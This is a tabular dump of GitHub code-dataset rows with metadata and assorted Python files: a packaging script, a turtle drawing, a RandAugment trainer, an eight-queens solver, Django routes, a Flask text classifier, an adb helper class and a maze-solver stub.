blob_id stringlengths 40 40 | directory_id stringlengths 40 40 | path stringlengths 2 616 | content_id stringlengths 40 40 | detected_licenses listlengths 0 69 | license_type stringclasses 2
values | repo_name stringlengths 5 118 | snapshot_id stringlengths 40 40 | revision_id stringlengths 40 40 | branch_name stringlengths 4 63 | visit_date timestamp[us] | revision_date timestamp[us] | committer_date timestamp[us] | github_id int64 2.91k 686M ⌀ | star_events_count int64 0 209k | fork_events_count int64 0 110k | gha_license_id stringclasses 23
values | gha_event_created_at timestamp[us] | gha_created_at timestamp[us] | gha_language stringclasses 220
values | src_encoding stringclasses 30
values | language stringclasses 1
value | is_vendor bool 2
classes | is_generated bool 2
classes | length_bytes int64 2 10.3M | extension stringclasses 257
values | content stringlengths 2 10.3M | authors listlengths 1 1 | author_id stringlengths 0 212 |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
dae4ecb5884d1cc97297a64c1834d03c9fdee1c8 | da3bfb9783d1341b7766b9e472de3b2c710ff99b | /setup.py | 6abed9f661bf9afd1eade9247f816e74a9d68a88 | [
"MIT"
] | permissive | ml-ai-nlp-ir/Utter-More | 7d74fb5206ef01e72a46218bd33218eb806aff10 | 98bed9468547cb4f2eb9df1209a9020e4be5d0a5 | refs/heads/master | 2020-03-25T11:54:48.411260 | 2018-07-31T10:05:42 | 2018-07-31T10:05:42 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 895 | py | from setuptools import setup, find_packages
import re
with open('README.md', 'r') as f:
long_description = f.read()
with open('utter_more/__init__.py', 'r') as f:
setup_file = f.read()
version = re.findall(r'__version__ = \'(.*)\'', setup_file)[0]
name = re.findall(r'__name__ = \'(.*)\'', setup_file)[0]
setup(
name=name,
version=version,
author='Jacob Scott',
author_email='jscott12009@gmail.com',
description='Creates utterances for Amazon\'s Alexa.',
license='MIT',
url='https://github.com/crumpstrr33/Utter-More',
packages=find_packages(exclude=['test*']),
python_requires='>=3',
long_description=long_description,
long_description_content_type='text/markdown',
classifiers=[
'Intended Audience :: Developers',
'License :: OSI Approved :: MIT License',
'Programming Language :: Python :: 3 :: Only'
]
)
| [
"jscott12009@gmail.com"
] | jscott12009@gmail.com |
5fdc3c4390e08eb72b6130d9e29542a87bf81fe3 | 00062339eecba8d0d7eac283816c29c57417ee14 | /sqaure.py | 8e6c1c8341a39b1c1e0e1fd177b4c7c9e3f09aea | [] | no_license | tomtch/python_pixel_art | cce2ba22a78842e31b1b6c6119f80d13e43edcb2 | ea8599ef68a15a80a921e0980852bc780bcf5e64 | refs/heads/main | 2023-07-13T16:17:40.813523 | 2021-09-10T11:11:27 | 2021-09-10T11:11:27 | 405,012,117 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 380 | py | import turtle
from datetime import datetime
from tkinter import Image
t = turtle.Turtle()
t.color("#3C9118", "cyan")
t.begin_fill()
for x in range(1,4):
t.forward(100)
t.left(90)
t.forward(100)
t.end_fill()
t.penup()
t.forward(150)
t.left(90)
t.pendown()
t.begin_fill()
for x in range(1,4):
t.forward(100)
t.left(90)
t.forward(100)
t.end_fill()
turtle.done()
| [
"tomtch18@gmail.com"
] | tomtch18@gmail.com |
d3fd4d5f5e723479c84cb518ed1e8f3a9e5420fc | 2d45ffc02f9ff348f6a995e72dd3d839dbca94c5 | /RandAugment/train.py | c854b9ab75c67a93d32584cdfde24c81b69a3aca | [
"MIT"
] | permissive | yuanxing-syy/pytorch-randaugment | 5c8fb9edb2657207879b398d7288f9c6eb9b7355 | dab97f8c1f45e291e4b89e0776c00fce49d95a18 | refs/heads/master | 2020-09-28T21:30:06.145147 | 2019-12-06T07:38:38 | 2019-12-06T07:38:38 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 10,932 | py | import itertools
import json
import logging
import math
import os
from collections import OrderedDict
import torch
from torch import nn, optim
from torch.nn.parallel.data_parallel import DataParallel
from tqdm import tqdm
from theconf import Config as C, ConfigArgumentParser
from RandAugment.common import get_logger
from RandAugment.data import get_dataloaders
from RandAugment.lr_scheduler import adjust_learning_rate_resnet
from RandAugment.metrics import accuracy, Accumulator
from RandAugment.networks import get_model, num_class
from warmup_scheduler import GradualWarmupScheduler
from RandAugment.common import add_filehandler
logger = get_logger('RandAugment')
logger.setLevel(logging.INFO)
def run_epoch(model, loader, loss_fn, optimizer, desc_default='', epoch=0, writer=None, verbose=1, scheduler=None):
tqdm_disable = bool(os.environ.get('TASK_NAME', '')) # KakaoBrain Environment
if verbose:
loader = tqdm(loader, disable=tqdm_disable)
loader.set_description('[%s %04d/%04d]' % (desc_default, epoch, C.get()['epoch']))
metrics = Accumulator()
cnt = 0
total_steps = len(loader)
steps = 0
for data, label in loader:
steps += 1
data, label = data.cuda(), label.cuda()
if optimizer:
optimizer.zero_grad()
preds = model(data)
loss = loss_fn(preds, label)
if optimizer:
loss.backward()
if C.get()['optimizer'].get('clip', 5) > 0:
nn.utils.clip_grad_norm_(model.parameters(), C.get()['optimizer'].get('clip', 5))
optimizer.step()
top1, top5 = accuracy(preds, label, (1, 5))
metrics.add_dict({
'loss': loss.item() * len(data),
'top1': top1.item() * len(data),
'top5': top5.item() * len(data),
})
cnt += len(data)
if verbose:
postfix = metrics / cnt
if optimizer:
postfix['lr'] = optimizer.param_groups[0]['lr']
loader.set_postfix(postfix)
if scheduler is not None:
scheduler.step(epoch - 1 + float(steps) / total_steps)
del preds, loss, top1, top5, data, label
if tqdm_disable:
if optimizer:
logger.info('[%s %03d/%03d] %s lr=%.6f', desc_default, epoch, C.get()['epoch'], metrics / cnt, optimizer.param_groups[0]['lr'])
else:
logger.info('[%s %03d/%03d] %s', desc_default, epoch, C.get()['epoch'], metrics / cnt)
metrics /= cnt
if optimizer:
metrics.metrics['lr'] = optimizer.param_groups[0]['lr']
if verbose:
for key, value in metrics.items():
writer.add_scalar(key, value, epoch)
return metrics
def train_and_eval(tag, dataroot, test_ratio=0.0, cv_fold=0, reporter=None, metric='last', save_path=None, only_eval=False):
if not reporter:
reporter = lambda **kwargs: 0
max_epoch = C.get()['epoch']
trainsampler, trainloader, validloader, testloader_ = get_dataloaders(C.get()['dataset'], C.get()['batch'], dataroot, test_ratio, split_idx=cv_fold)
# create a model & an optimizer
model = get_model(C.get()['model'], num_class(C.get()['dataset']))
criterion = nn.CrossEntropyLoss()
if C.get()['optimizer']['type'] == 'sgd':
optimizer = optim.SGD(
model.parameters(),
lr=C.get()['lr'],
momentum=C.get()['optimizer'].get('momentum', 0.9),
weight_decay=C.get()['optimizer']['decay'],
nesterov=C.get()['optimizer']['nesterov']
)
else:
raise ValueError('invalid optimizer type=%s' % C.get()['optimizer']['type'])
lr_scheduler_type = C.get()['lr_schedule'].get('type', 'cosine')
if lr_scheduler_type == 'cosine':
scheduler = torch.optim.lr_scheduler.CosineAnnealingLR(optimizer, T_max=C.get()['epoch'], eta_min=0.)
elif lr_scheduler_type == 'resnet':
scheduler = adjust_learning_rate_resnet(optimizer)
else:
raise ValueError('invalid lr_schduler=%s' % lr_scheduler_type)
if C.get()['lr_schedule'].get('warmup', None):
scheduler = GradualWarmupScheduler(
optimizer,
multiplier=C.get()['lr_schedule']['warmup']['multiplier'],
total_epoch=C.get()['lr_schedule']['warmup']['epoch'],
after_scheduler=scheduler
)
if not tag:
from RandAugment.metrics import SummaryWriterDummy as SummaryWriter
logger.warning('tag not provided, no tensorboard log.')
else:
from tensorboardX import SummaryWriter
writers = [SummaryWriter(log_dir='./logs/%s/%s' % (tag, x)) for x in ['train', 'valid', 'test']]
result = OrderedDict()
epoch_start = 1
if save_path and os.path.exists(save_path):
logger.info('%s file found. loading...' % save_path)
data = torch.load(save_path)
if 'model' in data or 'state_dict' in data:
key = 'model' if 'model' in data else 'state_dict'
logger.info('checkpoint epoch@%d' % data['epoch'])
if not isinstance(model, DataParallel):
model.load_state_dict({k.replace('module.', ''): v for k, v in data[key].items()})
else:
model.load_state_dict({k if 'module.' in k else 'module.'+k: v for k, v in data[key].items()})
optimizer.load_state_dict(data['optimizer'])
if data['epoch'] < C.get()['epoch']:
epoch_start = data['epoch']
else:
only_eval = True
else:
model.load_state_dict({k: v for k, v in data.items()})
del data
else:
logger.info('"%s" file not found. skip to pretrain weights...' % save_path)
if only_eval:
logger.warning('model checkpoint not found. only-evaluation mode is off.')
only_eval = False
if only_eval:
logger.info('evaluation only+')
model.eval()
rs = dict()
rs['train'] = run_epoch(model, trainloader, criterion, None, desc_default='train', epoch=0, writer=writers[0])
rs['valid'] = run_epoch(model, validloader, criterion, None, desc_default='valid', epoch=0, writer=writers[1])
rs['test'] = run_epoch(model, testloader_, criterion, None, desc_default='*test', epoch=0, writer=writers[2])
for key, setname in itertools.product(['loss', 'top1', 'top5'], ['train', 'valid', 'test']):
if setname not in rs:
continue
result['%s_%s' % (key, setname)] = rs[setname][key]
result['epoch'] = 0
return result
# train loop
best_top1 = 0
for epoch in range(epoch_start, max_epoch + 1):
model.train()
rs = dict()
rs['train'] = run_epoch(model, trainloader, criterion, optimizer, desc_default='train', epoch=epoch, writer=writers[0], verbose=True, scheduler=scheduler)
model.eval()
if math.isnan(rs['train']['loss']):
raise Exception('train loss is NaN.')
if epoch % 5 == 0 or epoch == max_epoch:
rs['valid'] = run_epoch(model, validloader, criterion, None, desc_default='valid', epoch=epoch, writer=writers[1], verbose=True)
rs['test'] = run_epoch(model, testloader_, criterion, None, desc_default='*test', epoch=epoch, writer=writers[2], verbose=True)
if metric == 'last' or rs[metric]['top1'] > best_top1:
if metric != 'last':
best_top1 = rs[metric]['top1']
for key, setname in itertools.product(['loss', 'top1', 'top5'], ['train', 'valid', 'test']):
result['%s_%s' % (key, setname)] = rs[setname][key]
result['epoch'] = epoch
writers[1].add_scalar('valid_top1/best', rs['valid']['top1'], epoch)
writers[2].add_scalar('test_top1/best', rs['test']['top1'], epoch)
reporter(
loss_valid=rs['valid']['loss'], top1_valid=rs['valid']['top1'],
loss_test=rs['test']['loss'], top1_test=rs['test']['top1']
)
# save checkpoint
if save_path:
logger.info('save model@%d to %s' % (epoch, save_path))
torch.save({
'epoch': epoch,
'log': {
'train': rs['train'].get_dict(),
'valid': rs['valid'].get_dict(),
'test': rs['test'].get_dict(),
},
'optimizer': optimizer.state_dict(),
'model': model.state_dict()
}, save_path)
torch.save({
'epoch': epoch,
'log': {
'train': rs['train'].get_dict(),
'valid': rs['valid'].get_dict(),
'test': rs['test'].get_dict(),
},
'optimizer': optimizer.state_dict(),
'model': model.state_dict()
}, save_path.replace('.pth', '_e%d_top1_%.3f_%.3f' % (epoch, rs['train']['top1'], rs['test']['top1']) + '.pth'))
del model
result['top1_test'] = best_top1
return result
if __name__ == '__main__':
parser = ConfigArgumentParser(conflict_handler='resolve')
parser.add_argument('--tag', type=str, default='')
parser.add_argument('--dataroot', type=str, default='/data/private/pretrainedmodels', help='torchvision data folder')
parser.add_argument('--save', type=str, default='')
parser.add_argument('--cv-ratio', type=float, default=0.0)
parser.add_argument('--cv', type=int, default=0)
parser.add_argument('--only-eval', action='store_true')
args = parser.parse_args()
assert (args.only_eval and args.save) or not args.only_eval, 'checkpoint path not provided in evaluation mode.'
if not args.only_eval:
if args.save:
logger.info('checkpoint will be saved at %s' % args.save)
else:
logger.warning('Provide --save argument to save the checkpoint. Without it, training result will not be saved!')
if args.save:
add_filehandler(logger, args.save.replace('.pth', '.log'))
logger.info(json.dumps(C.get().conf, indent=4))
import time
t = time.time()
result = train_and_eval(args.tag, args.dataroot, test_ratio=args.cv_ratio, cv_fold=args.cv, save_path=args.save, only_eval=args.only_eval, metric='test')
elapsed = time.time() - t
logger.info('done.')
logger.info('model: %s' % C.get()['model'])
logger.info('augmentation: %s' % C.get()['aug'])
logger.info('\n' + json.dumps(result, indent=4))
logger.info('elapsed time: %.3f Hours' % (elapsed / 3600.))
logger.info('top1 error in testset: %.4f' % (1. - result['top1_test']))
logger.info(args.save)
| [
"curtis.abcd@kakaobrain.com"
] | curtis.abcd@kakaobrain.com |
e7ef7fa6fef016bc2e8239b3f17ab4d671eb424a | 33a48e4a9a6781106fc33a1c13ad708484a69274 | /queen.py | 6fe92d474ba4859bb18065ad2d7059e9737f8145 | [] | no_license | Fazziekey/AI_project | 9569a780f06a528116d91f0ac0bc547a1d91a218 | 6a69d2ea914ec5dbc0107c064e21ffb7b976c1c9 | refs/heads/main | 2023-06-08T10:21:20.565925 | 2021-06-28T13:57:38 | 2021-06-28T13:57:38 | 349,648,844 | 10 | 1 | null | null | null | null | UTF-8 | Python | false | false | 3,997 | py | # Developer:Fazzie
# Time: 2021/3/2116:23
# File name: queen.py
# Development environment: Anaconda Python
import numpy as np # 提供维度数组与矩阵运算
import copy # 从copy模块导入深度拷贝方法
from board import Chessboard
'''
# 初始化8*8八皇后棋盘
chessboard = Chessboard()
# 在棋盘上的坐标点(4,4)落子
chessboard.setQueen(4,4)
# 方法一,逐子落子
# 选择False不打印中间过程棋盘
# 完成八皇后落子
# 终局胜负条件判定及输出
chessboard.boardInit(False)
chessboard.setQueen(0,0,False)
chessboard.setQueen(1,6,False)
chessboard.setQueen(2,4,False)
chessboard.setQueen(3,7,False)
chessboard.setQueen(4,1,False)
chessboard.setQueen(5,3,False)
chessboard.setQueen(6,5,False)
chessboard.setQueen(7,2,False)
chessboard.printChessboard(False)
print("Win? ---- ",chessboard.isWin())
# 方法二,序列落子
# 选择False不打印中间过程棋盘
# 完成八皇后落子
# 终局胜负条件判定及输出
chessboard.boardInit(False)
Queen_setRow = [0,6,4,7,1,3,5,2]
for i,item in enumerate(Queen_setRow):
chessboard.setQueen(i,item,False)
chessboard.printChessboard(False)
print("Win? ---- ",chessboard.isWin())
# 开放接口
# 让玩家自行体验八皇后游戏
chessboard = Chessboard()
chessboard.play()
'''
# 基于棋盘类,设计搜索策略
class Game:
def __init__(self, show=True):
"""
初始化游戏状态.
"""
self.chessBoard = Chessboard(show)
self.solves = []
self.solve = []
self.gameInit()
# 重置游戏
def gameInit(self, show=True):
"""
重置棋盘.
"""
self.Queen_setRow = [-1] * 8
self.chessBoard.boardInit(False)
##############################################################################
#### 请在以下区域中作答(可自由添加自定义函数) ####
#### 输出:self.solves = 八皇后所有序列解的list ####
#### 如:[[0,6,4,7,1,3,5,2],]代表八皇后的一个解为 ####
#### (0,0),(1,6),(2,4),(3,7),(4,1),(5,3),(6,5),(7,2) ####
##############################################################################
# #
def run(self, row=0):
if row == 8:
self.solves.append(list(self.solve))
#print("---/n", self.solves)
for column in range(8):
if self.isvalid(column):
self.solve.append(column)
# print(self.solve)
self.run(row+1)
self.solve.pop()
# #
##############################################################################
################# 完成后请记得提交作业 #################
##############################################################################
def isvalid(self,column):
for i in range(len(self.solve)):
if (len(self.solve) - i) == abs(column - self.solve[i]) or self.solve[i] == column:
return False
return True
def showResults(self, result):
"""
结果展示.
"""
self.chessBoard.boardInit(False)
for i, item in enumerate(result):
if item >= 0:
self.chessBoard.setQueen(i, item, False)
self.chessBoard.printChessboard(False)
def get_results(self):
"""
输出结果(请勿修改此函数).
return: 八皇后的序列解的list.
"""
self.run()
print("---/n", self.solves)
return self.solves
game = Game()
solutions = game.get_results()
print('There are {} results.'.format(len(solutions)))
#print(len(solutions[0]))
# print(solutions)
game.showResults(solutions[0])
| [
"1240419984@qq.com"
] | 1240419984@qq.com |
8143bc8f5472437617a95328464fcab857018571 | b8e79ccbcb68b7dd0342f4b64af99cad5cba2b1e | /Face_recognition_opencv_django/urls.py | 34a3a9594d9f549f12e6029d37b1250cabca6563 | [] | no_license | scekic/Face_Recognition_OpenCV_Django | 83e67e9d5abe3d4af986552de3715891324d0ace | 5c73c8303a9cd3fe18f680bb92de6e5e20e11e4a | refs/heads/master | 2022-09-17T12:33:28.442653 | 2020-06-04T11:16:27 | 2020-06-04T11:16:27 | 269,309,022 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,076 | py | """Face_recognition_opencv_django URL Configuration
The `urlpatterns` list routes URLs to views. For more information please see:
https://docs.djangoproject.com/en/3.0/topics/http/urls/
Examples:
Function views
1. Add an import: from my_app import views
2. Add a URL to urlpatterns: path('', views.home, name='home')
Class-based views
1. Add an import: from other_app.views import Home
2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')
Including another URLconf
1. Import the include() function: from django.urls import include, path
2. Add a URL to urlpatterns: path('blog/', include('blog.urls'))
"""
from django.conf.urls import url, include
from django.contrib import admin
from Face_recognition_opencv_django import views as app_views
urlpatterns = [
url(r'^$', app_views.index),
url(r'^create_dataset$', app_views.create_dataset),
url(r'^trainer$', app_views.trainer),
url(r'^detect$', app_views.detect),
url(r'^admin/', admin.site.urls),
url(r'^records/', include('face_recognition.urls')),
]
| [
"scekic.luka@gmail.com"
] | scekic.luka@gmail.com |
23033e06f849b85dadc20b94437ee03c24802976 | c7f43c4cc0ee84a5fe246b67f51e30b8d726ebd5 | /keras/keras09_mlp.py | 44099b84aa0e9f80008f67c742b96110ca820afa | [] | no_license | 89Mansions/AI_STUDY | d9f8bdf206f14ba41845a082e731ea844d3d9007 | d87c93355c949c462f96e85e8d0e186b0ce49c76 | refs/heads/master | 2023-07-21T19:11:23.539693 | 2021-08-30T08:18:59 | 2021-08-30T08:18:59 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 338 | py | import numpy as np
# x = np.array([1,2,3,4,5,6,7,8,9,10]) # 스칼라가 10개인 벡터 x
x = np.array([[1,2,3,4,5,6,7,8,9,10],
[1,2,3,4,5,6,7,8,9,10]]) # 스칼라가 10개인 벡터가 두 개인 행렬
y = np.array([1,2,3,4,5,6,7,8,9,10])
print(x.shape) #(10,) - 스칼라가 10개라는 의미 ----> (2, 10)
| [
"hwangkei0212@gmail.com"
] | hwangkei0212@gmail.com |
5d179adcafd7f73af265964dd7da77cb55ba8b2e | ce03bb849969449a7df149c5cfc46d9fbf7b267e | /app.py | 6d12b8c861a513334daddcea28380fd5fdc5502a | [] | no_license | MineYaman/OtomatikSesTranskripsiyonu | 31ec8dece5f55a887be60b28a03b2a3ee28c0994 | 927dfad4ed7ab89cdc0c6c24f13d8aeebdc05c6a | refs/heads/master | 2022-12-04T08:54:37.241191 | 2020-09-02T15:51:21 | 2020-09-02T15:51:21 | 292,323,053 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 7,630 | py | from flask import Flask,render_template,url_for,request
import pandas as pd
import pickle
import re
from sklearn.feature_extraction.text import CountVectorizer
import nltk
from nltk.corpus import stopwords
from nltk.tokenize import punkt
from nltk.corpus.reader import wordnet
from nltk.stem import WordNetLemmatizer
from sklearn.feature_extraction.text import TfidfVectorizer
from sklearn.model_selection import train_test_split
from sklearn.feature_selection import chi2
import numpy as np
app = Flask(__name__)
@app.route('/')
def home():
return render_template('home.html')
@app.route('/predict',methods=['POST'])
def predict(features):
path_df = r"C:\Users\Feyza\Desktop\denemetez\latest-dneme\Dataset Creation\News_dataset.pickle"
with open(path_df, 'rb') as data:
df = pickle.load(data)
df.head()
df.loc[1]['Content']
df['Content_Parsed_1'] = df['Content'].str.replace("\r", " ")
df['Content_Parsed_1'] = df['Content_Parsed_1'].str.replace("\n", " ")
df['Content_Parsed_1'] = df['Content_Parsed_1'].str.replace(" ", " ")
text = "Mr Greenspan\'s"
text
# " when quoting text
df['Content_Parsed_1'] = df['Content_Parsed_1'].str.replace('"', '')
# Lowercasing the text
df['Content_Parsed_2'] = df['Content_Parsed_1'].str.lower()
punctuation_signs = list("...?:!.,;")
df['Content_Parsed_3'] = df['Content_Parsed_2']
for punct_sign in punctuation_signs:
df['Content_Parsed_3'] = df['Content_Parsed_3'].str.replace(punct_sign, '')
df['Content_Parsed_4'] = df['Content_Parsed_3'].str.replace("'s", "")
# Downloading punkt and wordnet from NLTK
nltk.download('punkt')
print("------------------------------------------------------------")
nltk.download('wordnet')
# Saving the lemmatizer into an object
wordnet_lemmatizer = WordNetLemmatizer()
nrows = len(df)
lemmatized_text_list = []
for row in range(0, nrows):
# Create an empty list containing lemmatized words
lemmatized_list = []
# Save the text and its words into an object
text = df.loc[row]['Content_Parsed_4']
text_words = text.split(" ")
# Iterate through every word to lemmatize
for word in text_words:
lemmatized_list.append(wordnet_lemmatizer.lemmatize(word, pos="v"))
# Join the list
lemmatized_text = " ".join(lemmatized_list)
# Append to the list containing the texts
lemmatized_text_list.append(lemmatized_text)
df['Content_Parsed_5'] = lemmatized_text_list
# Downloading the stop words list
nltk.download('stopwords')
# Loading the stop words in english
stop_words = list(stopwords.words('english'))
stop_words[0:10]
example = "me eating a meal"
word = "me"
# The regular expression is:
regex = r"\b" + word + r"\b" # we need to build it like that to work properly
re.sub(regex, "StopWord", example)
df['Content_Parsed_6'] = df['Content_Parsed_5']
for stop_word in stop_words:
regex_stopword = r"\b" + stop_word + r"\b"
df['Content_Parsed_6'] = df['Content_Parsed_6'].str.replace(regex_stopword, '')
df.loc[5]['Content']
df.loc[5]['Content_Parsed_1']
df.loc[5]['Content_Parsed_2']
df.loc[5]['Content_Parsed_3']
df.loc[5]['Content_Parsed_4']
df.loc[5]['Content_Parsed_5']
df.loc[5]['Content_Parsed_6']
df.head(1)
list_columns = ["File_Name", "Category", "Complete_Filename", "Content", "Content_Parsed_6"]
df = df[list_columns]
df = df.rename(columns={'Content_Parsed_6': 'Content_Parsed'})
df.head()
category_codes = {
'business': 0,
'entertainment': 1,
'politics': 2,
'sport': 3,
'tech': 4
}
# Category mapping
df['Category_Code'] = df['Category']
df = df.replace({'Category_Code':category_codes})
df.head()
X_train, X_test, y_train, y_test = train_test_split(df['Content_Parsed'],
df['Category_Code'],
test_size=0.15,
random_state=8)
# Parameter election
ngram_range = (1,2)
min_df = 10
max_df = 1.
max_features = 300
tfidf = TfidfVectorizer(encoding='utf-8',
ngram_range=ngram_range,
stop_words=None,
lowercase=False,
max_df=max_df,
min_df=min_df,
max_features=max_features,
norm='l2',
sublinear_tf=True)
features_train = tfidf.fit_transform(X_train).toarray()
labels_train = y_train
print(features_train.shape)
features_test = tfidf.transform(X_test).toarray()
labels_test = y_test
print(features_test.shape)
from sklearn.feature_selection import chi2
import numpy as np
for Product, category_id in sorted(category_codes.items()):
features_chi2 = chi2(features_train, labels_train == category_id)
indices = np.argsort(features_chi2[0])
feature_names = np.array(tfidf.get_feature_names())[indices]
unigrams = [v for v in feature_names if len(v.split(' ')) == 1]
bigrams = [v for v in feature_names if len(v.split(' ')) == 2]
print("# '{}' category:".format(Product))
print(" . Most correlated unigrams:\n. {}".format('\n. '.join(unigrams[-5:])))
print(" . Most correlated bigrams:\n. {}".format('\n. '.join(bigrams[-2:])))
print("")
bigrams
# X_train
with open('X_train.pickle', 'wb') as output:
pickle.dump(X_train, output)
# X_test
with open('X_test.pickle', 'wb') as output:
pickle.dump(X_test, output)
# y_train
with open('y_train.pickle', 'wb') as output:
pickle.dump(y_train, output)
# y_test
with open('y_test.pickle', 'wb') as output:
pickle.dump(y_test, output)
# df
with open('df.pickle', 'wb') as output:
pickle.dump(df, output)
# features_train
with open('features_train.pickle', 'wb') as output:
pickle.dump(features_train, output)
# labels_train
with open('labels_train.pickle', 'wb') as output:
pickle.dump(labels_train, output)
# features_test
with open('features_test.pickle', 'wb') as output:
pickle.dump(features_test, output)
# labels_test
with open('labels_test.pickle', 'wb') as output:
pickle.dump(labels_test, output)
# TF-IDF object
with open('tfidf.pickle', 'wb') as output:
pickle.dump(tfidf, output)
# Obtain the highest probability of the predictions for each article
predictions_proba = svc_model.predict_proba(features).max(axis=1)
# Predict using the input model
predictions_pre = svc_model.predict(features)
# Replace prediction with 6 if associated cond. probability less than threshold
predictions = []
for prob, cat in zip(predictions_proba, predictions_pre):
if prob > .65:
predictions.append(cat)
else:
predictions.append(5)
# Return result
categories = [get_category_name(x) for x in predictions]
if request.method == 'POST':
message = request.form['message']
data = [message]
my_prediction = get_category_name(prediction_svc)
return render_template('result.html',prediction = my_prediction)
if __name__ == '__main__':
app.run(debug=True) | [
"mnyaman04@gmail.com"
] | mnyaman04@gmail.com |
3a7a2558b686ecc6eafbb7ffb04cd3c616b7751b | 025adca8ce56eb0113ca44ce1254bc8127d8d604 | /com/Tools/MyPoco/foundation/information.py | f30acecc528a06a20c8326fb75c8530da306a029 | [] | no_license | yuzhujiutian/RobotizationTest | c141ac60c00a3fe000ee9ddbf31317b150e8f377 | 4652e21b75ac2b3630f0377164c28a3611b11b5b | refs/heads/master | 2022-09-25T07:17:38.596744 | 2020-06-04T12:41:09 | 2020-06-04T12:41:09 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 5,246 | py | # _*_coding:utf-8 _*_
# !/usr/bin/python3
# Reference:********************************
# encoding: utf-8
# @Time: 2019/11/6 14:58
# @Author: 洞洞
# @File: information.py
# @Function:框架基础类,不要直接在脚本中调用,编写辅助脚本使用MyPocoObject类
# 用于拓展框架函数使用
# @Method:
# Reference:********************************
import configparser
import datetime
import re
import threading
from airtest.core.api import *
import shutil
class Information:
def __init__(self):
self.cf = configparser.ConfigParser()
# 获取当前文件所在目录的上一级目录
root_dir = os.path.abspath(os.path.dirname(os.path.dirname(__file__)))
# 拼接得到config.ini文件的路径,直接使用
self.root_dir_path = root_dir + "\\info_tab\\config.ini"
self.cf.read(self.root_dir_path)
self.thread_file_name = str(threading.get_ident())
def remove_section(self, section_name):
'''
删除配置文件中的项
:param section_name:项名称
:return:
'''
self.cf.remove_section(section_name)
self.cf.write(open(self.root_dir_path, "w"))
def remove_option(self, section_name,option_name):
'''
删除配置文件中项的指定元素
:param section_name:项名称
:return:
'''
self.cf.remove_option(section_name,option_name)
self.cf.write(open(self.root_dir_path, "w"))
def is_section_exist(self, section_name):
'''
判断配置文件中模块是否存在
:param section_name:模块名称
:return:True/False
'''
sections_list = self.cf.sections()
if section_name in sections_list:
return True
else:
return False
def add_section(self, section_name):
'''
在配置文件中添加模块
:param section_name:模块名称
:return:
'''
self.cf.add_section(section_name)
self.cf.write(open(self.root_dir_path, "w"))
def get_config(self, list_name, key):
"""
从配置文件中读取信息
:param list_name: 模块名
:param key: key
:return: value
"""
value = self.cf.get(list_name, key)
return value
def get_options(self, list_name):
"""
从配置文件中读取模块下所有key
:param list_name: 模块名
:return: keys_list
"""
keys_list = self.cf.options(list_name)
return keys_list
def set_config(self, list_name, key, value):
"""
设置配置文件中模块下key-value
:param list_name: 模块名
:param key: key
:param value: value
:return:
"""
self.cf.set(list_name, key, value)
self.cf.write(open(self.root_dir_path, "w"))
def get_phone_name(self):
"""
todo 可以搞一个类,启动的时候自带加载所有信息
获取手机的名字,主要用于区分高中端机
:return:
"""
lines = os.popen("adb devices -l").readlines()
total = "model"
for line in lines:
if re.findall(total, line):
# 将这一行,按空格分割成一个list
lis = line.split(" ")
# print(lis)
for li in lis:
if re.findall(total, li):
li1 = li.split(":")
st = li1[1]
phone_name = st
return phone_name
def get_phone_size(self):
"""获取手机的宽高,分辨率
return:list_int[宽,高]
"""
phone_size_list_int = int(self.get_config("Phone_Size", self.thread_file_name))
return phone_size_list_int
def game_is_running(self):
"""
判断游戏还在不在了,判断是否闪退
:return:
"""
sleep(3)
game_name = self.get_config("App_Name", "game_name")
islist = os.popen("adb shell pidof " + game_name).readlines()
if len(islist) == 0:
is_run = False
else:
is_run = True
return is_run
def get_now_tiem_num(self):
"""
获取当前时间戳
:return: int
"""
return int(time.time())
def get_time_str(self, str_time_input):
"""
根据时间戳字符串换算日期和星期
:param poco_time_input:包含时间戳text的poco对象
:return: [int(ymd),int(hms),int(week)]
"""
game_time_int = int(str_time_input)
dateArray = datetime.datetime.fromtimestamp(game_time_int)
ymd = dateArray.strftime("%Y%m%d")
hms = dateArray.strftime("%H%M%S")
week = dateArray.strptime(ymd, "%Y%m%d").weekday()
return [int(ymd), int(hms[:-2]), int(week) + 1]
def remove_file(self,file_path):
if os.path.isdir(file_path): # 判断该文件是否为文件夹
shutil.rmtree(file_path) # 若为文件夹,则直接删除
elif os.path.isfile(file_path):# 判断该文件是否为文件
pass
| [
"342714677@qq.com"
] | 342714677@qq.com |
0c8dab75f3ff866ab6e4102f5e25974642afc211 | 22e2887c3f37af58238a966d919cba45b2908ec1 | /plugin.video.ChristianTV/FuckNeulionService.py | e8c42e02beb1e0c976466e1ba29a473b59474634 | [] | no_license | kodiwizard/repository.kodiwizard | 29a54f47c74c97f3249ac77bd5f6392b36863787 | c45db8ac5fbc185e18abfb8de7fa69a9403aca69 | refs/heads/master | 2020-03-13T17:29:33.954084 | 2019-01-22T22:39:18 | 2019-01-22T22:39:18 | 131,218,210 | 2 | 1 | null | null | null | null | UTF-8 | Python | false | false | 153 | py | import subprocess
import sys
subprocess.call("/usr/bin/python /storage/.kodi/addons/plugin.video.white.devil/jars/FuckNeulionService.py &", shell=True)
| [
"thomasnz@hotmail.com"
] | thomasnz@hotmail.com |
790dc7efa12d0f58d79f64aa3d58cd003eeb702e | 61f4833bc5af1cf841db607d38e01294b471068e | /source/T7_Graphs/P3_Maizes/L7_WayFinder1.py | a676a28009f0100d825994d8209ec12fac911e2e | [] | no_license | krenevych/algo | 5936297834d95d3e79b4e37a6edb5d17e62572bc | 883c62f7846dde84204ea09a31fa1ce18ad2a98d | refs/heads/master | 2023-05-26T03:52:25.491238 | 2023-05-19T05:48:34 | 2023-05-19T05:48:34 | 146,658,064 | 8 | 19 | null | 2023-03-05T12:04:28 | 2018-08-29T21:01:02 | Python | UTF-8 | Python | false | false | 2,513 | py | from source.T5_LinearStructure.P1_Stack.L_1_Stack import Stack
from source.T7_Graphs.P3_Maizes.L2_ShowMaze import showMaze
from source.T7_Graphs.P3_Maizes.L4_ReadMazeFromFile import readMazeFromFile
from source.T7_Graphs.P3_Maizes.L5_Wave import wave
